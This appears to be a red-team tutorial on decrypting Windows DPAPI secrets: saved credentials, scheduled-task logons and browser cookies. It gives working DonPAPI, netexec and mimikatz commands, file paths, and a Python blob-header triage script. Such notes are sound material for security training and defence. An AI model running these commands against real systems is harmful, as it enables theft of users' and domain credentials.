DPAPI, Browser Cookies, and CredMan

Windows needs to store encrypted secrets for things like scheduled task logons, saved RDP/network credentials and Chromium-based browser cookies. Most of this goes through DPAPI: each secret is a blob encrypted under a per-user masterkey, and the Windows Credential Manager keeps its credential blobs in "vaults". If you're a local Administrator you can pull the masterkeys of logged-on users out of LSASS (or, as Domain Admin, export the domain DPAPI backup key, which decrypts every domain user's masterkeys) and use them to decrypt the vault credentials and cookies.

DonPAPI is an excellent tool for this. Add -nr to skip the SAM and LSASS dumping and watch the cleartext creds roll in. --pvkfile takes the domain DPAPI backup key (exported from a DC, e.g. with mimikatz lsadump::backupkeys /system:DC /export), which lets DonPAPI decrypt any domain user's masterkeys offline without touching LSASS:

donpapi collect -d jotter.com -u Administrator -H HASHES -t 10.10.10.0/24 --pvkfile ./backup.pvk

Netexec also has a DPAPI module. With no option it dumps the Credential Manager blobs of every user it can decrypt, including the SYSTEM ones:

nxc smb 10.10.10.10 -u Admin -p Pass --dpapi

# Skip the SYSTEM (machine account) DPAPI blobs, e.g. scheduled task logons under systemprofile
nxc smb 10.10.10.10 -u Admin -p Pass --dpapi nosystem

# Browser cookies
nxc smb 10.10.10.10 -u Admin -p Pass --dpapi cookies

Manual Identification

Locating Credentials

Masterkeys live under each user's Protect folder: one subfolder per SID, one file per masterkey GUID. The credential blobs themselves sit in the Credentials folders, per user and, for scheduled task logons running as SYSTEM, under systemprofile. All of these are hidden system files, so list them with dir /a or Get-ChildItem -Force.

C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\<SID>\
C:\Users\USERNAME\AppData\Local\Microsoft\Credentials
C:\Users\USERNAME\AppData\Roaming\Microsoft\Credentials
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

You can also use mimikatz to list the masterkeys currently cached in LSASS for logged-on users (these need no DC round trip), and to list the Credential Manager vaults.

mimikatz sekurlsa::dpapi
mimikatz vault::list

Decrypting

After identifying a target credential file, find the masterkey GUID that protects it. The GUID sits in the blob's unencrypted header, so dpapi::cred without a key just parses the file and prints guidMasterKey:

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C

If that GUID shows up in the sekurlsa::dpapi output you already have the masterkey (its MasterKey field). Otherwise decrypt the masterkey file itself. /rpc asks the DC to unwrap it over the backup key protocol, which only works in the security context of the user who owns the masterkey; with an exported domain backup key you can use /pvk:backup.pvk offline instead.

mimikatz dpapi::masterkey /in:C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc

Finally, decrypt the credential with the masterkey. mimikatz caches every masterkey it decrypts (dpapi::cache), so a later dpapi::cred /in: without /masterkey picks it up automatically.

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
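When you have copied a pile of Credentials files off a box, the "which masterkey do I need" question from the locating and decrypting steps above can be answered offline without mimikatz. The script below is an added example, not code from DonPAPI, netexec or mimikatz: it parses only the unencrypted DPAPI_BLOB header (version, provider GUID, masterkey GUID, description, algorithms, lengths), unwraps the 12-byte Credential Manager file header when present, and reports which masterkey GUIDs you still lack compared with the ones you hold from sekurlsa::dpapi or the Protect\<SID> listing. The file name dpapi_triage.py, the built-in sample blob (filler bytes, not real ciphertext) and its "Local Credential Data" description are assumptions for the demo; the masterkey GUID reused in the sample is the one from the Protect path on this page.

```python
# Added example (not DonPAPI, netexec or mimikatz code): offline triage of
# Credential Manager files / raw DPAPI blobs. Only the unencrypted header is
# parsed, which is enough to learn which masterkey GUID each blob needs and to
# compare that against the masterkeys you already hold (sekurlsa::dpapi
# output, or the file names under Microsoft\Protect\<SID>\).
import struct
import sys
import uuid

# Provider GUID that CryptProtectData writes into every DPAPI blob.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# CryptoAPI ALG_IDs DPAPI uses for the cipher and the MAC.
CALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
              0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}

def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4

def _guid(buf, off):
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16

def _lp(buf, off):
    """DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    return bytes(buf[off:off + n]), off + n

def parse_dpapi_blob(blob):
    """Walk the DPAPI_BLOB header; ciphertext and signature stay opaque."""
    version, off = _u32(blob, 0)
    provider, off = _guid(blob, off)
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (provider %s)" % provider)
    _mk_version, off = _u32(blob, off)
    mk_guid, off = _guid(blob, off)
    flags, off = _u32(blob, off)
    desc, off = _lp(blob, off)                 # UTF-16LE, NUL terminated
    crypt_alg = struct.unpack_from("<I", blob, off)[0]
    off += 8                                   # ALG_ID + key length in bits
    salt, off = _lp(blob, off)
    _strong, off = _lp(blob, off)              # "strong" HMAC key, normally empty
    hash_alg = struct.unpack_from("<I", blob, off)[0]
    off += 8                                   # ALG_ID + hash length in bits
    _hmac, off = _lp(blob, off)
    data, off = _lp(blob, off)
    sign, off = _lp(blob, off)
    if off != len(blob):
        raise ValueError("%d trailing bytes after blob" % (len(blob) - off))
    return {
        "version": version,
        "masterkey_guid": str(mk_guid),
        "flags": flags,
        "description": desc.decode("utf-16-le").rstrip("\x00"),
        "crypt_alg": CALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "hash_alg": CALG_NAMES.get(hash_alg, hex(hash_alg)),
        "salt_len": len(salt),
        "ciphertext_len": len(data),
        "signature_len": len(sign),
    }

def parse_credential_file(raw):
    """Files under Microsoft\\Credentials wrap the blob in a 12-byte header
    (dwVersion, dwBlobSize, dwUnknown). A bare blob is accepted as well."""
    if len(raw) >= 20 and uuid.UUID(bytes_le=bytes(raw[4:20])) == DPAPI_PROVIDER_GUID:
        return parse_dpapi_blob(raw)
    _version, blob_size, _unknown = struct.unpack_from("<III", raw, 0)
    return parse_dpapi_blob(raw[12:12 + blob_size])

def missing_masterkeys(parsed_blobs, held_guids):
    """Masterkey GUIDs the blobs need minus the ones you already hold."""
    need = {b["masterkey_guid"].lower() for b in parsed_blobs}
    return sorted(need - {g.lower() for g in held_guids})

def build_sample_credential_file(mk_guid, description):
    """Constructed test vector: structurally valid, but salt, ciphertext and
    signature are filler bytes, so nothing can decrypt it."""
    def lp(b):
        return struct.pack("<I", len(b)) + b
    blob = b"".join([
        struct.pack("<I", 1), DPAPI_PROVIDER_GUID.bytes_le,
        struct.pack("<I", 1), uuid.UUID(mk_guid).bytes_le,
        struct.pack("<I", 0), lp((description + "\x00").encode("utf-16-le")),
        struct.pack("<II", 0x6610, 256), lp(b"\x11" * 32), lp(b""),
        struct.pack("<II", 0x800E, 512), lp(b"\x22" * 32),
        lp(b"\x33" * 48), lp(b"\x44" * 64),
    ])
    return struct.pack("<III", 1, len(blob), 0) + blob

if __name__ == "__main__":
    # usage: python dpapi_triage.py <credential files...>; no args = built-in sample.
    # The GUID is the masterkey from this page's Protect path, assumed to be held.
    held = ["bfc5090d-22fe-4058-8953-47f6882f549e"]
    files = [open(p, "rb").read() for p in sys.argv[1:]] or \
        [build_sample_credential_file(held[0], "Local Credential Data")]
    parsed = [parse_credential_file(f) for f in files]
    for p in parsed:
        print(p)
    print("masterkeys still needed:", missing_masterkeys(parsed, held))
```

Point it at the copied Credentials files and put the GUIDs you already have (from sekurlsa::dpapi or the Protect\<SID> file names) in held; whatever it lists as still needed is what you have to fetch with dpapi::masterkey /rpc or /pvk before dpapi::cred will succeed. Note that Credential Manager blobs are the only ones with the extra 12-byte file header; Chromium's Local State key and other CryptProtectData output are bare blobs, which the same parser accepts.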
